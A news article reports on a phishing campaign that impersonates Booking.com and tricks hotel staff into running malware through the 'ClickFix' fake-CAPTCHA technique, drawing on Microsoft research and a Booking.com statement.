Phishing campaign impersonating Booking.com targets hospitality sector with malware

This article was updated with comment from a Booking.com spokesperson.

Hotel and hostel workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. 

In a phishing campaign that began in December 2024 and has continued through February, the threat actors are targeting people in the hospitality industry across North America, Southeast Asia and Europe who are likely to work with Booking.com and to open emails from the travel platform. 

A report from Microsoft published on Thursday tracks a technique called “ClickFix” where hackers try to “take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware.”

“This need for user interaction could allow an attack to slip through conventional and automated security features,” Microsoft said. “In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.” 

The researchers tied the campaign to the group Storm-1865, which has launched several other phishing campaigns that involve stealing payment data and making fraudulent charges. 

The malicious emails included a variety of content, with some referencing bad guest reviews, account verification or demands from potential guests. 

Most of the emails include a link or a PDF attachment purportedly taking victims to Booking.com. When clicked, victims are taken to a fake CAPTCHA page where the ClickFix scheme is deployed. 

“This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard,” the researchers said, noting that from there malware is downloaded on victim devices.  

Microsoft found several different strains of malware deployed on victim devices, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT.

All of the malware strains allow the hackers to steal financial information and credentials. 

A spokesperson for Booking.com said the “actual numbers of accommodations affected by this scam are a small fraction of those on our platform” and the company has made “significant investments to limit the impact” on their customers and partners. 

“While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” the spokesperson said.

Microsoft noted that Storm-1865 targeted hotel guests in 2023 using another Booking.com lure, and in 2024 it attacked e-commerce customers with phishing messages. 

These campaigns have increased in volume since early 2023, Microsoft said. 

The tech giant urged hospitality workers to always check a sender’s email address, to search for typos in emails and to be wary of any messages requiring them to take an action.